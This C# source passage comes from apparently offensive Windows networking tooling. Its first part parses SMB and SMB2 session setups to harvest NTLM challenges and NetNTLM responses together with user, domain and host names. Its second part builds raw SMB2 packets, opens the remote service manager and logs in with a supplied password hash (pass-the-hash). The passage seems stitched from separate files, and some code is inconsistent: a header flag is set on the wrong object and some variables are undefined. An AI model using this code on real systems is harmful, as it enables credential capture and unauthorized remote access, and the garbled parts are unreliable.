NTLMHelper ntlmHelper = new NTLMHelper(smbCOMSessionSetupAndXResponse.SecurityBlob);
if (ntlmHelper.Signature.StartsWith("NTLMSSP"))
{
if (ntlmHelper.MessageType == 2)
{
NTLMChallenge ntlmChallenge = new NTLMChallenge(smbCOMSessionSetupAndXResponse.SecurityBlob);
session = String.Concat(listenerIP, ":", listenerPort);
challenge = BitConverter.ToString(ntlmChallenge.ServerChallenge).Replace("-", "");
Program.smbSessionTable[session] = challenge;
Output.Queue(string.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), clientPort, challenge, clientIP, listenerPort));
}
}
}
else
{
Output.Queue(string.Format("[.] [{0}] SMB({1}) Kerberos authentication from {2}:{3}", Output.Timestamp(), clientPort, clientIP, listenerPort));
}
}
}
else
{
SMBCOMSessionSetupAndXRequest smbCOMSessionSetupAndXRequest = new SMBCOMSessionSetupAndXRequest(data, 32 + sessionServiceIndex);
if (smbCOMSessionSetupAndXRequest.SecurityBlobLength > 0)
{
if (!BitConverter.ToString(smbCOMSessionSetupAndXRequest.SecurityBlob).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos
{
NTLMHelper ntlmHelper = new NTLMHelper(smbCOMSessionSetupAndXRequest.SecurityBlob);
if (ntlmHelper.Signature.StartsWith("NTLMSSP"))
{
if (ntlmHelper.MessageType == 3)
{
NTLMResponse ntlmResponse = new NTLMResponse(smbCOMSessionSetupAndXRequest.SecurityBlob);
session = String.Concat(clientIP, ":", clientPort);
challenge = Program.smbSessionTable[session]?.ToString();
string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName);
string user = Encoding.Unicode.GetString(ntlmResponse.UserName);
string host = Encoding.Unicode.GetString(ntlmResponse.Workstation);
string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", "");
string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", "");
Output.NTLMOutput(user, domain, challenge, response, clientIP, host, "SMB", listenerPort, clientPort, lmResponse);
}
}
}
}
}
}
break;
}
}
else if (helper.Protocol[0] == 0xfe)
{
smb2Header.ReadBytes(data, sessionServiceIndex);
string flags = Convert.ToString(BitConverter.ToUInt16(smb2Header.Flags, 0), 2).PadLeft(smb2Header.Flags.Length * 8, '0');
switch (smb2Header.Command)
{
case 0:
{
if (String.Equals(flags.Substring(31, 1), "0"))
{
Output.Queue(String.Format("[.] [{0}] SMB2+({1}) negotiation request detected from {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort));
}
}
break;
case 1:
{
if (String.Equals(flags.Substring(31, 1), "1"))
{
SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(data, 64 + sessionServiceIndex);
if (smb2SessionSetupResponse.SecurityBufferLength > 0)
{
if (!BitConverter.ToString(smb2SessionSetupResponse.Buffer).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos
{
NTLMHelper ntlmHelper = new NTLMHelper(smb2SessionSetupResponse.Buffer);
if (ntlmHelper.Signature.StartsWith("NTLMSSP"))
{
if (ntlmHelper.MessageType == 2)
{
NTLMChallenge ntlmChallenge = new NTLMChallenge(smb2SessionSetupResponse.Buffer);
session = BitConverter.ToString(smb2Header.SessionId).Replace("-", "");
challenge = BitConverter.ToString(ntlmChallenge.ServerChallenge).Replace("-", "");
Program.smbSessionTable[session] = challenge;
Output.Queue(String.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), clientPort, challenge, clientIP, listenerPort));
}
}
}
else
{
Output.Queue(string.Format("[.] [{0}] SMB({1}) Kerberos authentication from {2}:{3}", Output.Timestamp(), clientPort, clientIP, listenerPort));
}
}
}
else
{
SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(data, 64 + sessionServiceIndex);
if (smb2SessionSetupRequest.SecurityBufferLength > 0)
{
if (!BitConverter.ToString(smb2SessionSetupRequest.Buffer).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos
{
NTLMHelper ntlmHelper = new NTLMHelper(smb2SessionSetupRequest.Buffer);
if (ntlmHelper.Signature.StartsWith("NTLMSSP"))
{
if (ntlmHelper.MessageType == 3)
{
NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer);
session = BitConverter.ToString(smb2Header.SessionId).Replace("-", "");
challenge = Program.smbSessionTable[session]?.ToString();
string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName);
string user = Encoding.Unicode.GetString(ntlmResponse.UserName);
string host = Encoding.Unicode.GetString(ntlmResponse.Workstation);
string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", "");
string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", "");
Output.NTLMOutput(user, domain, challenge, response, clientIP, host, "SMB", listenerPort, clientPort, lmResponse);
}
}
}
}
}
}
break;
}
}
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean FindRequest()
{
treeId = recieve.Skip(40).Take(4).ToArray();
////////////////////////////////////////////////////////////////////////////////
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x0e, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
header.SetChainOffset(new Byte[] { 0x68, 0x00, 0x00, 0x00 });
SMB2FindFileRequestFile findFileRequestFile = new SMB2FindFileRequestFile();
findFileRequestFile.SetInfoLevel(new Byte[] { 0x25 });
findFileRequestFile.SetFileID(guidFileHandle);
findFileRequestFile.SetPadding(new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
Byte[] bData = findFileRequestFile.GetRequest();
if (signing)
{
header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
////////////////////////////////////////////////////////////////////////////////
SMB2Header header2 = new SMB2Header();
header2.SetCommand(new Byte[] { 0x0e, 0x00 });
header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header2.SetMessageID(++messageId);
header2.SetProcessID(processId);
header2.SetTreeId(treeId);
header2.SetSessionID(sessionId);
header.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 });
SMB2FindFileRequestFile findFileRequestFile2 = new SMB2FindFileRequestFile();
findFileRequestFile2.SetInfoLevel(new Byte[] { 0x25 });
findFileRequestFile2.SetFileID(guidFileHandle);
findFileRequestFile2.SetPadding(new Byte[] { 0x80, 0x00, 0x00, 0x00 });
Byte[] bData2 = findFileRequestFile2.GetRequest();
if (signing)
{
header2.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header2.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader2 = header2.GetHeader();
////////////////////////////////////////////////////////////////////////////////
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length);
sessionService.SetDataLength(bData.Length + bData2.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Combine combine = new Combine();
combine.Extend(bHeader);
combine.Extend(bData);
combine.Extend(bHeader2);
combine.Extend(bData2);
Byte[] bSend = Combine.combine(bSessionService, combine.Retrieve());
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
return(GetStatus(recieve.Skip(12).Take(4).ToArray()));
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal virtual Boolean ReadRequest()
{
treeId = recieve.Skip(40).Take(4).ToArray();
////////////////////////////////////////////////////////////////////////////////
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x05, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SMB2ReadRequest readRequest = new SMB2ReadRequest();
readRequest.SetGuidHandleFile(guidFileHandle);
Byte[] bData = readRequest.GetRequest();
header.SetChainOffset(bData.Length);
if (signing)
{
header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
else
{
header.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x00 });
}
Byte[] bHeader = header.GetHeader();
////////////////////////////////////////////////////////////////////////////////
SMB2Header header2 = new SMB2Header();
header2.SetCommand(new Byte[] { 0x0e, 0x00 });
header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header2.SetMessageID(++messageId);
header2.SetProcessID(processId);
header2.SetTreeId(treeId);
header2.SetSessionID(sessionId);
header2.SetChainOffset(new Byte[] { 0x68, 0x00, 0x00, 0x00 });
SMB2FindFileRequestFile requestFile = new SMB2FindFileRequestFile();
requestFile.SetPadding(new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
Byte[] bData2 = requestFile.GetRequest();
if (signing)
{
header2.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header2.SetSignature(sessionKey, ref bData2);
}
else
{
header2.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 });
}
Byte[] bHeader2 = header2.GetHeader();
////////////////////////////////////////////////////////////////////////////////
SMB2Header header3 = new SMB2Header();
header3.SetCommand(new Byte[] { 0x0e, 0x00 });
header3.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header3.SetMessageID(++messageId);
header3.SetProcessID(processId);
header3.SetTreeId(treeId);
header3.SetSessionID(sessionId);
SMB2FindFileRequestFile requestFile2 = new SMB2FindFileRequestFile();
requestFile2.SetOutputBufferLength(new Byte[] { 0x80, 0x00, 0x00, 0x00 });
Byte[] bData3 = requestFile2.GetRequest();
if (signing)
{
header3.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 });
header3.SetSignature(sessionKey, ref bData3);
}
else
{
header3.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 });
}
Byte[] bHeader3 = header3.GetHeader();
////////////////////////////////////////////////////////////////////////////////
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length + bHeader3.Length);
sessionService.SetDataLength(bData.Length + bData2.Length + bData3.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
bSend = Combine.combine(bSend, Combine.combine(bHeader2, bData2));
bSend = Combine.combine(bSend, Combine.combine(bHeader3, bData3));
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
return true;
else
return false;
}
internal Boolean OpenSCManagerW()
{
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x09, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x01, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
SVCCTLSCMOpenSCManagerW openSCManagerW = new SVCCTLSCMOpenSCManagerW();
Byte[] bSCManager = openSCManagerW.GetRequest();
DCERPCRequest rpcRequest = new DCERPCRequest();
rpcRequest.SetPacketFlags(new Byte[] { 0x03 });
rpcRequest.SetFragLength(bSCManager.Length, 0, 0);
rpcRequest.SetCallID(new Byte[] { 0x01, 0x00, 0x00, 0x00 });
rpcRequest.SetContextID(new Byte[] { 0x00, 0x00 });
rpcRequest.SetOpnum(new Byte[] { 0x0f, 0x00 });
Byte[] bRPCRequest = rpcRequest.GetRequest();
SMB2WriteRequest writeRequest = new SMB2WriteRequest();
writeRequest.SetGuidHandleFile(guidFileHandle);
writeRequest.SetLength(bRPCRequest.Length + bSCManager.Length);
Byte[] bWriteRequest = writeRequest.GetRequest();
Combine combine = new Combine();
combine.Extend(bWriteRequest);
combine.Extend(bRPCRequest);
combine.Extend(bSCManager);
Byte[] bData = combine.Retrieve();
if (signing)
{
header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 });
header.SetSignature(sessionKey, ref bData);
}
Byte[] bHeader = header.GetHeader();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(bSend, 0, bSend.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
return(true);
}
else
{
return(false);
}
}
////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
internal Boolean Authenticate(String domain, String username, String hash)
{
String NTLMSSP = BitConverter.ToString(recieve).Replace("-", "");
Int32 index = NTLMSSP.IndexOf("4E544C4D53535000") / 2;
UInt16 wDomain = BitConverter.ToUInt16(recieve.Skip(index + 12).Take(2).ToArray(), 0);
UInt16 wtarget = BitConverter.ToUInt16(recieve.Skip(index + 40).Take(2).ToArray(), 0);
sessionId = recieve.Skip(44).Take(8).ToArray();
Byte[] bServerChallenge = recieve.Skip(index + 24).Take(8).ToArray();
Int32 start = index + 56 + wDomain;
Int32 end = index + 55 + wDomain + wtarget;
Byte[] details = recieve.Skip(start).Take(end - start + 1).ToArray();
Byte[] bTime = details.Skip(details.Length - 12).Take(8).ToArray();
Int32 j = 0;
Byte[] bHash = new Byte[hash.Length / 2];
for (Int32 i = 0; i < hash.Length; i += 2)
{
bHash[j++] = (Byte)((Char)Convert.ToInt16(hash.Substring(i, 2),16));
}
Byte[] bHostname = Encoding.Unicode.GetBytes(Environment.MachineName);
Byte[] hostnameLength = BitConverter.GetBytes(bHostname.Length).Take(2).ToArray();
Byte[] bDomain = Encoding.Unicode.GetBytes(domain);
Byte[] domainLength = BitConverter.GetBytes(bDomain.Length).Take(2).ToArray();
Byte[] bUsername = Encoding.Unicode.GetBytes(username);
Byte[] usernameLength = BitConverter.GetBytes(bUsername.Length).Take(2).ToArray();
Byte[] domainOffset = { 0x40, 0x00, 0x00, 0x00 };
Byte[] usernameOffset = BitConverter.GetBytes(bDomain.Length + 64);
Byte[] hostnameOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + 64);
Byte[] lmOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 64);
Byte[] ntOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 88);
String usernameTarget = username.ToUpper();
Byte[] bUsernameTarget = Encoding.Unicode.GetBytes(usernameTarget);
bUsernameTarget = Combine.combine(bUsernameTarget, bDomain);
Byte[] NetNTLMv2Hash;
using (HMACMD5 hmac = new HMACMD5())
{
hmac.Key = bHash;
NetNTLMv2Hash = hmac.ComputeHash(bUsernameTarget);
}
Byte[] bClientChallenge = new Byte[8];
Random random = new Random();
for (Int32 i = 0; i < 8; i++)
{
bClientChallenge[i] = (Byte)random.Next(0, 255);
}
Byte[] blob = Combine.combine(new Byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, bTime);
blob = Combine.combine(blob, bClientChallenge);
blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00 });
blob = Combine.combine(blob, details);
blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
Byte[] bServerChallengeAndBlob = Combine.combine(bServerChallenge, blob);
Byte[] NetNTLMv2Response;
using (HMACMD5 hmacMD5 = new HMACMD5())
{
hmacMD5.Key = NetNTLMv2Hash;
NetNTLMv2Response = hmacMD5.ComputeHash(bServerChallengeAndBlob);
}
if (signing)
{
using (HMACMD5 hmacMD5 = new HMACMD5())
{
hmacMD5.Key = NetNTLMv2Hash;
sessionKey = hmacMD5.ComputeHash(NetNTLMv2Response);
}
}
NetNTLMv2Response = Combine.combine(NetNTLMv2Response, blob);
Byte[] NetNTLMv2ResponseLength = BitConverter.GetBytes(NetNTLMv2Response.Length).Take(2).ToArray();
Byte[] sessionKeyOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + NetNTLMv2Response.Length + 88);
Byte[] NetNTLMSSPResponse = { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00 };
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, lmOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, ntOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyOffset);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, flags);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bDomain);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bUsername);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bHostname);
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2Response);
SMB2Header header = new SMB2Header();
header.SetCommand(new Byte[] { 0x01, 0x00 });
header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 });
header.SetMessageID(++messageId);
header.SetProcessID(processId);
header.SetTreeId(treeId);
header.SetSessionID(sessionId);
Byte[] bHeader = header.GetHeader();
NTLMSSPAuth ntlmSSPAuth = new NTLMSSPAuth();
ntlmSSPAuth.SetNetNTLMResponse(NetNTLMSSPResponse);
Byte[] bNTLMSSPAuth = ntlmSSPAuth.GetNTLMSSPAuth();
SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest();
sessionSetup.SetSecurityBlob(bNTLMSSPAuth);
Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest();
NetBIOSSessionService sessionService = new NetBIOSSessionService();
sessionService.SetHeaderLength(bHeader.Length);
sessionService.SetDataLength(bData.Length);
Byte[] bSessionService = sessionService.GetNetBIOSSessionService();
Byte[] send = Combine.combine(Combine.combine(bSessionService, bHeader), bData);
streamSocket.Write(send, 0, send.Length);
streamSocket.Flush();
streamSocket.Read(recieve, 0, recieve.Length);
if (GetStatus(recieve.Skip(12).Take(4).ToArray()))
{
Console.WriteLine("[+] Login Successful");
return true;
}
else
return false;
}
